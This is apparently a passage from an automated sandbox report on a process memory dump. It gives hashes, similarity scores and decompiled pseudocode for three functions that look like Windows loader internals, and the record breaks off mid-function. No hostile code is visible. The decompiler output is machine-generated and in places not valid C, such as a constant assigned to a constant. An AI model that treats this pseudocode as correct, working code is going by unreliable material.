0x00000000
0x0100b485
0x00fbd665
0x00fbd652
0x00000000

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98682b39720dc9cf23a7beb24d4d8cb6837dd1a958673da19b9bb6f3037d1504
Instruction ID: f4d058f0d8f3b3266392d387241ec3fd6baf29d7554accaf6595f177a0c2cfc9
Opcode Fuzzy Hash: 98682b39720dc9cf23a7beb24d4d8cb6837dd1a958673da19b9bb6f3037d1504
Instruction Fuzzy Hash: 45E1F335A003598FEB35CF1AC990BE9B7B2BF41314F1441E9E94997291EB34AD81EF42

Uniqueness

Uniqueness Score: -1.00%

Function 00FB849B, Relevance: .3, Instructions: 290
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E00FB849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
				void* _t136;
				signed int _t139;
				signed int _t141;
				signed int _t145;
				intOrPtr _t146;
				signed int _t149;
				signed int _t150;
				signed int _t161;
				signed int _t163;
				signed int _t165;
				signed int _t169;
				signed int _t171;
				signed int _t194;
				signed int _t200;
				void* _t201;
				signed int _t204;
				signed int _t206;
				signed int _t210;
				signed int _t214;
				signed int _t215;
				signed int _t218;
				void* _t221;
				signed int _t224;
				signed int _t226;
				intOrPtr _t228;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				void* _t237;
				void* _t238;

				_t236 = __esi;
				_t235 = __edi;
				_t193 = __ebx;
				_push(0x70);
				_push(0x107f9c0);
				E00FFD0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
				if( *0x1097b04 == 0) {
					L4:
					goto L5;
				} else {
					_t136 = E00FBCEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
					_t236 = 0;
					if(_t136 < 0) {
						 *((intOrPtr*)(_t237 - 0x54)) = 0;
					}
					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
						_t193 =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x68) = _t236;
						 *(_t237 - 0x6c) = _t236;
						_t235 = _t236;
						 *(_t237 - 0x60) = _t236;
						E00FC2280( *[fs:0x30], 0x1098550);
						_t139 =  *0x1097b04; // 0x1
						__eflags = _t139 - 1;
						if(__eflags != 0) {
							_t200 = 0xc;
							_t201 = _t237 - 0x40;
							_t141 = E00FDF3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
							 *(_t237 - 0x44) = _t141;
							__eflags = _t141;
							if(_t141 < 0) {
								L50:
								E00FBFFB0(_t193, _t235, 0x1098550);
								L5:
								return E00FFD130(_t193, _t235, _t236);
							}
							_push(_t201);
							_t221 = 0x10;
							_t202 =  *(_t237 - 0x40);
							_t145 = E00FA1C45( *(_t237 - 0x40), _t221);
							 *(_t237 - 0x44) = _t145;
							__eflags = _t145;
							if(_t145 < 0) {
								goto L50;
							}
							_t146 =  *0x1097b9c; // 0x0
							_t235 = L00FC4620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
							 *(_t237 - 0x60) = _t235;
							__eflags = _t235;
							if(_t235 == 0) {
								_t149 = 0xc0000017;
								 *(_t237 - 0x44) = 0xc0000017;
							} else {
								_t149 =  *(_t237 - 0x44);
							}
							__eflags = _t149;
							if(__eflags >= 0) {
								L8:
								 *(_t237 - 0x64) = _t235;
								_t150 =  *0x1097b10; // 0x0
								 *(_t237 - 0x4c) = _t150;
								_push(_t237 - 0x74);
								_push(_t237 - 0x39);
								_push(_t237 - 0x58);
								_t193 = E00FDA61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags);
								 *(_t237 - 0x44) = _t193;
								__eflags = _t193;
								if(_t193 < 0) {
									L30:
									E00FBFFB0(_t193, _t235, 0x1098550);
									__eflags = _t235 - _t237 - 0x38;
									if(_t235 != _t237 - 0x38) {
										_t235 =  *(_t237 - 0x48);
										L00FC77F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
									} else {
										_t235 =  *(_t237 - 0x48);
									}
									__eflags =  *(_t237 - 0x6c);
									if( *(_t237 - 0x6c) != 0) {
										L00FC77F0(_t235, _t236,  *(_t237 - 0x6c));
									}
									__eflags = _t193;
									if(_t193 >= 0) {
										goto L4;
									} else {
										goto L5;
									}
								}
								_t204 =  *0x1097b04; // 0x1
								 *(_t235 + 8) = _t204;
								__eflags =  *((char*)(_t237 - 0x39));
								if( *((char*)(_t237 - 0x39)) != 0) {
									 *(_t235 + 4) = 1;
									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
									_t161 =  *0x1097b10; // 0x0
									 *(_t237 - 0x4c) = _t161;
								} else {
									 *(_t235 + 4) = _t236;
									 *(_t235 + 0xc) =  *(_t237 - 0x58);
								}
								 *((intOrPtr*)(_t237 - 0x54)) = E00FE37C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
								_t224 = _t236;
								 *(_t237 - 0x40) = _t236;
								 *(_t237 - 0x50) = _t236;
								while(1) {
									_t163 =  *(_t235 + 8);
									__eflags = _t224 - _t163;
									if(_t224 >= _t163) {
										break;
									}
									_t228 =  *0x1097b9c; // 0x0
									_t214 = L00FC4620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
									 *(_t237 - 0x78) = _t214;
									__eflags = _t214;
									if(_t214 == 0) {
										L52:
										_t193 = 0xc0000017;
										L19:
										 *(_t237 - 0x44) = _t193;
										L20:
										_t206 =  *(_t237 - 0x40);
										__eflags = _t206;
										if(_t206 == 0) {
											L26:
											__eflags = _t193;
											if(_t193 < 0) {
												E00FE37F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) != 0) {
													 *0x1097b10 =  *0x1097b10 - 8;
												}
											} else {
												_t169 =  *(_t237 - 0x68);
												__eflags = _t169;
												if(_t169 != 0) {
													 *0x1097b04 =  *0x1097b04 - _t169;
												}
											}
											__eflags = _t193;
											if(_t193 >= 0) {
												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
											}
											goto L30;
										}
										_t226 = _t206 * 0xc;
										__eflags = _t226;
										_t194 =  *(_t237 - 0x48);
										do {
											 *(_t237 - 0x40) = _t206 - 1;
											_t226 = _t226 - 0xc;
											 *(_t237 - 0x4c) = _t226;
											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
													__eflags =  *((char*)(_t237 - 0x39));
													if( *((char*)(_t237 - 0x39)) == 0) {
														_t171 = _t210;
													} else {
														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
														L00FC77F0(_t194, _t236, _t210 - 8);
														_t171 =  *(_t237 - 0x50);
													}
													L48:
													L00FC77F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
													L46:
													_t206 =  *(_t237 - 0x40);
													_t226 =  *(_t237 - 0x4c);
													goto L24;
												}
												 *0x1097b08 =  *0x1097b08 + 1;
												goto L24;
											}
											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
											__eflags = _t171;
											if(_t171 != 0) {
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) == 0) {
													goto L48;
												}
												E00FE57C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
												goto L46;
											}
											L24:
											__eflags = _t206;
										} while (_t206 != 0);
										_t193 =  *(_t237 - 0x44);
										goto L26;
									}
									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
									 *(_t237 - 0x7c) = _t232;
									 *(_t232 - 4) = _t214;
									 *(_t237 - 4) = _t236;
									E00FEF3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
									_t238 = _t238 + 0xc;
									 *(_t237 - 4) = 0xfffffffe;
									_t215 =  *(_t237 - 0x48);
									__eflags = _t193;
									if(_t193 < 0) {
										L00FC77F0(_t215, _t236,  *(_t237 - 0x78));
										goto L20;
									}
									__eflags =  *((char*)(_t237 - 0x39));
									if( *((char*)(_t237 - 0x39)) != 0) {
										_t233 = E00FDA44B( *(_t237 - 0x4c));
										 *(_t237 - 0x50) = _t233;
										__eflags = _t233;
										if(_t233 == 0) {
											L00FC77F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
											goto L52;
										}
										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
										L17:
										_t234 =  *(_t237 - 0x40);
										_t218 = _t234 * 0xc;
										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
										 *(_t218 + _t235 + 0x10) = _t236;
										_t224 = _t234 + 1;
										 *(_t237 - 0x40) = _t224;
										 *(_t237 - 0x50) = _t224;
										_t193 =  *(_t237 - 0x44);
										continue;
									}
									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
									goto L17;
								}
								 *_t235 = _t236;
								_t165 = 0x10 + _t163 * 0xc;
								__eflags = _t165;
								_push(_t165);
								_push(_t235);
								_push(0x23);
								_push(0xffffffff);
								_t193 = E00FE96C0();
								goto L19;
							} else {
								goto L50;
							}
						}
						_t235 = _t237 - 0x38;
						 *(_t237 - 0x60) = _t235;
						goto L8;
					}
					goto L4;
				}
			}

0x00fb849b
0x00fb849b
0x00fb849b
0x00fb849b
0x00fb849d
0x00fb84a2
0x00fb84a7
0x00fb84b1
0x00fb84d8
0x00000000
0x00fb84b3
0x00fb84c4
0x00fb84c9
0x00fb84cd
0x00fb84cf
0x00fb84cf
0x00fb84d6
0x00fb84e6
0x00fb84e9
0x00fb84ec
0x00fb84ef
0x00fb84f2
0x00fb84f4
0x00fb84fc
0x00fb8501
0x00fb8506
0x00fb8509
0x00fb86e0
0x00fb86e5
0x00fb86e8
0x00fb86ed
0x00fb86f0
0x00fb86f2
0x01009afd
0x01009b02
0x00fb84da
0x00fb84df
0x00fb84df
0x00fb86fa
0x00fb86fd
0x00fb86fe
0x00fb8701
0x00fb8706
0x00fb8709
0x00fb870b
0x00000000
0x00000000
0x00fb8711
0x00fb8725
0x00fb8727
0x00fb872a
0x00fb872c
0x01009af0
0x01009af5
0x00fb8732
0x00fb8732
0x00fb8732
0x00fb8735
0x00fb8737
0x00fb8515
0x00fb8515
0x00fb8518
0x00fb851d
0x00fb8523
0x00fb8527
0x00fb852b
0x00fb8537
0x00fb8539
0x00fb853c
0x00fb853e
0x00fb868c
0x00fb8691
0x00fb8699
0x00fb869b
0x00fb8744
0x00fb8748
0x00fb86a1
0x00fb86a1
0x00fb86a1
0x00fb86a4
0x00fb86a8
0x01009bdf
0x01009bdf
0x00fb86ae
0x00fb86b0
0x00000000
0x00fb86b6
0x00000000
0x01009be9
0x00fb86b0
0x00fb8544
0x00fb854a
0x00fb854d
0x00fb8551
0x00fb876e
0x00fb8778
0x00fb877b
0x00fb8780
0x00fb8557
0x00fb8557
0x00fb855d
0x00fb855d
0x00fb856b
0x00fb856e
0x00fb8570
0x00fb8573
0x00fb8576
0x00fb8576
0x00fb8579
0x00fb857b
0x00000000
0x00000000
0x00fb8581
0x00fb85a0
0x00fb85a2
0x00fb85a5
0x00fb85a7
0x01009b1b
0x01009b1b
0x00fb862e
0x00fb862e
0x00fb8631
0x00fb8631
0x00fb8634
0x00fb8636
0x00fb8669
0x00fb8669
0x00fb866b
0x01009bbf
0x01009bc4
0x01009bc8
0x01009bce
0x01009bce
0x00fb8671
0x00fb8671
0x00fb8674
0x00fb8676
0x01009bae
0x01009bae
0x00fb8676
0x00fb867c
0x00fb867e
0x00fb8688
0x00fb8688
0x00000000
0x00fb867e
0x00fb8638
0x00fb8638
0x00fb863b
0x00fb863e
0x00fb863f
0x00fb8642
0x00fb8645
0x00fb8648
0x00fb864d
0x01009b69
0x01009b6e
0x01009b7b
0x01009b81
0x01009b85
0x01009b89
0x01009ba7
0x01009b8b
0x01009b91
0x01009b9a
0x01009b9f
0x01009b9f
0x00fb8788
0x00fb878d
0x00fb8763
0x00fb8763
0x00fb8766
0x00000000
0x00fb8766
0x01009b70
0x00000000
0x01009b70
0x00fb8656
0x00fb865a
0x00fb865c
0x00fb8752
0x00fb8756
0x00000000
0x00000000
0x00fb875e
0x00000000
0x00fb875e
0x00fb8662
0x00fb8662
0x00fb8662
0x00fb8666
0x00000000
0x00fb8666
0x00fb85b7
0x00fb85b9
0x00fb85bc
0x00fb85bf
0x00fb85cc
0x00fb85d1
0x00fb85d4
0x00fb85db
0x00fb85de
0x00fb85e0
0x01009b5f
0x00000000
0x01009b5f
0x00fb85e6
0x00fb85ea
0x00fb86c3
0x00fb86c5
0x00fb86c8
0x00fb86ca
0x01009b16
0x00000000
0x01009b16
0x00fb86d6
0x00fb85f6
0x00fb85f6
0x00fb85f9
0x00fb8602
0x00fb8606
0x00fb860a
0x00fb860b
0x00fb860e
0x00fb8611
0x00000000
0x00fb8611
0x00fb85f3
0x00000000
0x00fb85f3
0x00fb8619
0x00fb861e
0x00fb861e
0x00fb8621
0x00fb8622
0x00fb8623
0x00fb8625
0x00fb862c
0x00000000
0x00fb873d
0x00000000
0x00fb873d
0x00fb8737
0x00fb850f
0x00fb8512
0x00000000
0x00fb8512
0x00000000
0x00fb84d6

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d90f51fcbf921a25a8dc3debed6711b7a7e88679417b6c15427b47273e9069ae
Instruction ID: 2461b1f69547d26b21d27aadef596b289291e3661e2adfba2be0341c7e455001
Opcode Fuzzy Hash: d90f51fcbf921a25a8dc3debed6711b7a7e88679417b6c15427b47273e9069ae
Instruction Fuzzy Hash: 22B17F71E00209DFDB15DF9AC994BEDBBBABF84344F204129E505AB246DB74AC46DF40

Uniqueness

Uniqueness Score: -1.00%

Function 00FD513A, Relevance: .3, Instructions: 258
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E00FD513A(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				signed char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v63;
				char _v64;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed char* _v92;
				signed int _v100;
				signed int _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t157;
				signed int _t159;
				signed int _t160;
				unsigned int* _t161;
				intOrPtr _t165;
				signed int _t172;
				signed char* _t181;
				intOrPtr _t189;
				intOrPtr* _t200;
				signed int _t202;
				signed int _t203;
				char _t204;
				signed int _t207;
				signed int _t208;
				void* _t209;
				intOrPtr _t210;
				signed int _t212;
				signed int _t214;
				signed int _t221;
				signed int _t222;
				signed int _t226;
				intOrPtr* _t232;
				signed int _t233;
				signed int _t234;
				intOrPtr _t237;
				intOrPtr _t238;
				intOrPtr _t240;
				void* _t245;
				signed int _t246;
				signed int _t247;
				void* _t248;
				void* _t251;
				void* _t252;
				signed int _t253;
				signed int _t255;
				signed int _t256;

				_t255 = (_t253 & 0xfffffff8) - 0x6c;
				_v8 =  *0x109d360 ^ _t255;
				_v32 = _v32 & 0x00000000;
				_t251 = __edx;
				_t237 = __ecx;
				_t212 = 6;
				_t245 =  &_v84;
				_t207 =  *((intOrPtr*)(__ecx + 0x48));
				_v44 =  *((intOrPtr*)(__edx + 0xc8));
				_v48 = __ecx;
				_v36 = _t207;
				_t157 = memset(_t245, 0, _t212 << 2);
				_t256 = _t255 + 0xc;
				_t246 = _t245 + _t212;
				if(_t207 == 2) {
					_t247 =  *(_t237 + 0x60);
					_t208 =  *(_t237 + 0x64);
					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
					_t159 =  *((intOrPtr*)(_t237 + 0x58));
					_v104 = _t159;
					_v76 = _t159;
					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
					_v100 = _t160;
					_v72 = _t160;
					L19:
					_v80 = _t208;
					_v84 = _t247;
					L8:
					_t214 = 0;
					if( *(_t237 + 0x74) > 0) {
						_t82 = _t237 + 0x84; // 0x124
						_t161 = _t82;
						_v92 = _t161;
						while( *_t161 >> 0x1f != 0) {
							_t200 = _v92;
							if( *_t200 == 0x80000000) {
								break;
							}
							_t214 = _t214 + 1;
							_t161 = _t200 + 0x10;
							_v92 = _t161;
							if(_t214 <  *(_t237 + 0x74)) {
								continue;
							}
							goto L9;
						}
						_v88 = _t214 << 4;
						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
						_t165 = 0;
						asm("adc eax, [ecx+edx+0x7c]");
						_v24 = _t165;
						_v28 = _v40;
						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
						_t221 = _v40;
						_v16 =  *_v92;
						_v32 =  &_v28;
						if( *(_t237 + 0x4e) >> 0xf == 0) {
							goto L9;
						}
						_t240 = _v48;
						if( *_v92 != 0x80000000) {
							goto L9;
						}
						 *((intOrPtr*)(_t221 + 8)) = 0;
						 *((intOrPtr*)(_t221 + 0xc)) = 0;
						 *((intOrPtr*)(_t221 + 0x14)) = 0;
						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
						_t226 = 0;
						_t181 = _t251 + 0x66;
						_v88 = 0;
						_v92 = _t181;
						do {
							if( *((char*)(_t181 - 2)) == 0) {
								goto L31;
							}
							_t226 = _v88;
							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
								_t181 = E00FED0F0(1, _t226 + 0x20, 0);
								_t226 = _v40;
								 *(_t226 + 8) = _t181;
								 *((intOrPtr*)(_t226 + 0xc)) = 0;
								L34:
								if(_v44 == 0) {
									goto L9;
								}
								_t210 = _v44;
								_t127 = _t210 + 0x1c; // 0x1c
								_t249 = _t127;
								E00FC2280(_t181, _t127);
								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
								_t185 =  *((intOrPtr*)(_t210 + 0x94));
								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
									L00FC77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
								}
								_t189 = L00FC4620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
								if(_t189 != 0) {
									 *((intOrPtr*)(_t189 + 8)) = _v20;
									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
									_t232 =  *((intOrPtr*)(_t210 + 0x94));
									 *_t232 = _t232 + 0x10;
									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
									E00FEF3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
									_t256 = _t256 + 0xc;
								}
								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
								E00FBFFB0(_t210, _t249, _t249);
								_t222 = _v76;
								_t172 = _v80;
								_t208 = _v84;
								_t247 = _v88;
								L10:
								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
								_v44 = _t238;
								if(_t238 != 0) {
									 *0x109b1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
									_v44();
								}
								_pop(_t248);
								_pop(_t252);
								_pop(_t209);
								return E00FEB640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
							}
							_t181 = _v92;
							L31:
							_t226 = _t226 + 1;
							_t181 =  &(_t181[0x18]);
							_v88 = _t226;
							_v92 = _t181;
						} while (_t226 < 4);
						goto L34;
					}
					L9:
					_t172 = _v104;
					_t222 = _v100;
					goto L10;
				}
				_t247 = _t246 | 0xffffffff;
				_t208 = _t247;
				_v84 = _t247;
				_v80 = _t208;
				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
					_t233 = _v72;
					_v105 = _v64;
					_t202 = _v76;
				} else {
					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
					_v105 = 1;
					if(_v63 <= _t204) {
						_v63 = _t204;
					}
					_t202 = _v76 |  *(_t251 + 0x40);
					_t233 = _v72 |  *(_t251 + 0x44);
					_t247 =  *(_t251 + 0x38);
					_t208 =  *(_t251 + 0x3c);
					_v76 = _t202;
					_v72 = _t233;
					_v84 = _t247;
					_v80 = _t208;
				}
				_v104 = _t202;
				_v100 = _t233;
				if( *((char*)(_t251 + 0xc4)) != 0) {
					_t237 = _v48;
					_v105 = 1;
					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
						_t237 = _v48;
					}
					_t203 = _t202 |  *(_t251 + 0xb8);
					_t234 = _t233 |  *(_t251 + 0xbc);
					_t247 = _t247 &  *(_t251 + 0xb0);
					_t208 = _t208 &  *(_t251 + 0xb4);
					_v104 = _t203;
					_v76 = _t203;
					_v100 = _t234;
					_v72 = _t234;
					_v84 = _t247;
					_v80 = _t208;
				}
				if(_v105 == 0) {
					_v36 = _v36 & 0x00000000;
					_t208 = 0;
					_t247 = 0;
					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
					goto L19;
				} else {
					_v36 = 1;
					goto L8;
				}
			}

0x00fd5142
0x00fd514c
0x00fd5150
0x00fd5157
0x00fd5159
0x00fd515e
0x00fd5165
0x00fd5169
0x00fd516c
0x00fd5172
0x00fd5176
0x00fd517a
0x00fd517a
0x00fd517a
0x00fd517f
0x01016d8b
0x01016d8e
0x01016d91
0x01016d95
0x01016d98
0x01016d9c
0x01016da0
0x01016da3
0x01016da7
0x01016e26
0x01016e26
0x01016e2a
0x00fd51f9
0x00fd51f9
0x00fd51fe
0x01016e33
0x01016e33
0x01016e39
0x01016e3d
0x01016e46
0x01016e50
0x00000000
0x00000000
0x01016e52
0x01016e53
0x01016e56
0x01016e5d
0x00000000
0x00000000
0x00000000
0x01016e5f
0x01016e67
0x01016e77
0x01016e7f
0x01016e80
0x01016e88
0x01016e90
0x01016e9f
0x01016ea5
0x01016ea9
0x01016eb1
0x01016ebf
0x00000000
0x00000000
0x01016ecf
0x01016ed3
0x00000000
0x00000000
0x01016edb
0x01016ede
0x01016ee1
0x01016ee8
0x01016eeb
0x01016eed
0x01016ef0
0x01016ef4
0x01016ef8
0x01016efc
0x00000000
0x00000000
0x01016f0d
0x01016f11
0x01016f32
0x01016f37
0x01016f3b
0x01016f3e
0x01016f41
0x01016f46
0x00000000
0x00000000
0x01016f4c
0x01016f50
0x01016f50
0x01016f54
0x01016f62
0x01016f65
0x01016f6d
0x01016f7b
0x01016f7b
0x01016f93
0x01016f98
0x01016fa0
0x01016fa6
0x01016fb3
0x01016fb6
0x01016fbf
0x01016fc1
0x01016fd5
0x01016fda
0x01016fda
0x01016fdd
0x01016fe2
0x01016fe7
0x01016feb
0x01016fef
0x01016ff3
0x00fd520c
0x00fd520c
0x00fd520f
0x00fd5215
0x00fd5234
0x00fd523a
0x00fd523a
0x00fd5244
0x00fd5245
0x00fd5246
0x00fd5251
0x00fd5251
0x01016f13
0x01016f17
0x01016f17
0x01016f18
0x01016f1b
0x01016f1f
0x01016f23
0x00000000
0x01016f28
0x00fd5204
0x00fd5204
0x00fd5208
0x00000000
0x00fd5208
0x00fd5185
0x00fd5188
0x00fd518a
0x00fd518e
0x00fd5195
0x01016db1
0x01016db5
0x01016db9
0x00fd519b
0x00fd519b
0x00fd519e
0x00fd51a7
0x00fd51a9
0x00fd51a9
0x00fd51b5
0x00fd51b8
0x00fd51bb
0x00fd51be
0x00fd51c1
0x00fd51c5
0x00fd51c9
0x00fd51cd
0x00fd51cd
0x00fd51d8
0x00fd51dc
0x00fd51e0
0x01016dcc
0x01016dd0
0x01016dd5
0x01016ddd
0x01016de1
0x01016de1
0x01016de5
0x01016deb
0x01016df1
0x01016df7
0x01016dfd
0x01016e01
0x01016e05
0x01016e09
0x01016e0d
0x01016e11
0x01016e11
0x00fd51eb
0x01016e1a
0x01016e1f
0x01016e21
0x01016e23
0x00000000
0x00fd51f1
0x00fd51f1
0x00000000
0x00fd51f1

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a23b3ff0c8df5bdefdf5a8a18e6470e5fd026e5a3f33d43d40015a61f04b15f9
Instruction ID: 5a92ba7a40caa23a44f6b0218a2423954d4748c923a475da065530632e22a855
Opcode Fuzzy Hash: a23b3ff0c8df5bdefdf5a8a18e6470e5fd026e5a3f33d43d40015a61f04b15f9
Instruction Fuzzy Hash: 52C121755083808FD354CF28C980A5AFBE1BF88704F188AAEF9D98B352D775E945DB42

Uniqueness

Uniqueness Score: -1.00%

Function 00FD03E2, Relevance: .3, Instructions: 254
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E00FD03E2(signed int __ecx, signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				char _v56;
				char _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t56;
				signed int _t58;
				char* _t64;
				intOrPtr _t65;
				signed int _t74;
				signed int _t79;
				char* _t83;
				intOrPtr _t84;
				signed int _t93;
				signed int _t94;
				signed char* _t95;
				signed int _t99;
				signed int _t100;
				signed char* _t101;
				signed int _t105;
				signed int _t119;
				signed int _t120;
				void* _t122;
				signed int _t123;
				signed int _t127;

				_v8 =  *0x109d360 ^ _t127;
				_t119 = __ecx;
				_t105 = __edx;
				_t118 = 0;
				_v20 = __edx;
				_t120 =  *(__ecx + 0x20);
				if(E00FD0548(__ecx, 0) != 0) {
					_t56 = 0xc000022d;
					L23:
					return E00FEB640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
				} else {
					_v12 = _v12 | 0xffffffff;
					_t58 = _t120 + 0x24;
					_t109 =  *(_t120 + 0x18);
					_t118 = _t58;
					_v16 = _t58;
					E00FBB02A( *(_t120 + 0x18), _t118, 0x14a5);
					_v52 = 0x18;
					_v48 = 0;
					0x840 = 0x40;
					if( *0x1097c1c != 0) {
					}
					_v40 = 0x840;
					_v44 = _t105;
					_v36 = 0;
					_v32 = 0;
					if(E00FC7D50() != 0) {
						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t64 = 0x7ffe0384;
					}
					if( *_t64 != 0) {
						_t65 =  *[fs:0x30];
						__eflags =  *(_t65 + 0x240) & 0x00000004;
						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
							_t100 = E00FC7D50();
							__eflags = _t100;
							if(_t100 == 0) {
								_t101 = 0x7ffe0385;
							} else {
								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t101 & 0x00000020;
							if(( *_t101 & 0x00000020) != 0) {
								_t118 = _t118 | 0xffffffff;
								_t109 = 0x1485;
								E01027016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					_t105 = 0;
					while(1) {
						_push(0x60);
						_push(5);
						_push( &_v64);
						_push( &_v52);
						_push(0x100021);
						_push( &_v12);
						_t122 = E00FE9830();
						if(_t122 >= 0) {
							break;
						}
						__eflags = _t122 - 0xc0000034;
						if(_t122 == 0xc0000034) {
							L38:
							_t120 = 0xc0000135;
							break;
						}
						__eflags = _t122 - 0xc000003a;
						if(_t122 == 0xc000003a) {
							goto L38;
						}
						__eflags = _t122 - 0xc0000022;
						if(_t122 != 0xc0000022) {
							break;
						}
						__eflags = _t105;
						if(__eflags != 0) {
							break;
						}
						_t109 = _t119;
						_t99 = E010269A6(_t119, __eflags);
						__eflags = _t99;
						if(_t99 == 0) {
							break;
						}
						_t105 = _t105 + 1;
					}
					if( !_t120 >= 0) {
						L22:
						_t56 = _t120;
						goto L23;
					}
					if( *0x1097c04 != 0) {
						_t118 = _v12;
						_t120 = E0102A7AC(_t119, _t118, _t109);
						__eflags = _t120;
						if(_t120 >= 0) {
							goto L10;
						}
						__eflags =  *0x1097bd8;
						if( *0x1097bd8 != 0) {
							L20:
							if(_v12 != 0xffffffff) {
								_push(_v12);
								E00FE95D0();
							}
							goto L22;
						}
					}
					L10:
					_push(_v12);
					_t105 = _t119 + 0xc;
					_push(0x1000000);
					_push(0x10);
					_push(0);
					_push(0);
					_push(0xf);
					_push(_t105);
					_t120 = E00FE99A0();
					if(_t120 < 0) {
						__eflags = _t120 - 0xc000047e;
						if(_t120 == 0xc000047e) {
							L51:
							_t74 = E01023540(_t120);
							_t119 = _v16;
							_t120 = _t74;
							L52:
							_t118 = 0x1485;
							E00FAB1E1(_t120, 0x1485, 0, _t119);
							goto L20;
						}
						__eflags = _t120 - 0xc000047f;
						if(_t120 == 0xc000047f) {
							goto L51;
						}
						__eflags = _t120 - 0xc0000462;
						if(_t120 == 0xc0000462) {
							goto L51;
						}
